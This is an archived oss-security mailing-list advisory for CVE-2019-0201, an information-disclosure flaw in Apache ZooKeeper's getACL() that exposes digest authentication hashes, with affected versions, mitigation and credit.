[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] [CVE-2019-0201] Information disclosure vulnerability in Apache ZooKeeper
From:       Andor Molnar <andor () apache ! org>
Date:       2019-05-20 17:15:24
Message-ID: 52C7AFA8-8CAB-4613-95E9-3EED492B9693 () apache ! org
[Download RAW message or body]

CVE-2019-0201: Information disclosure vulnerability in Apache ZooKeeper

Severity: Critical

Vendor: The Apache Software Foundation

Versions Affected: ZooKeeper prior to 3.4.14, ZooKeeper 3.5.0-alpha through 3.5.4-beta. The \
unsupported ZooKeeper 1.x through 3.3.x versions may be also affected.

Description: ZooKeeper's getACL() command doesn't check any permission when retrieves the ACLs \
of the requested node and returns all information contained in the ACL Id field as plaintext \
string. DigestAuthenticationProvider overloads the Id field with the hash value that is used \
for user authentication. As a consequence, if Digest Authentication is in use, the unsalted \
hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.

Mitigation: Use an authentication method other than Digest (e.g. Kerberos) or upgrade to 3.4.14 \
or later (3.5.5 or later if on the 3.5 branch).

Credit: This issue was identified by Harrison Neal <harrison@patchadvisor.com> PatchAdvisor, \
Inc.

References: https://issues.apache.org/jira/browse/ZOOKEEPER-1392


[prev in list] [next in list] [prev in thread] [next in thread]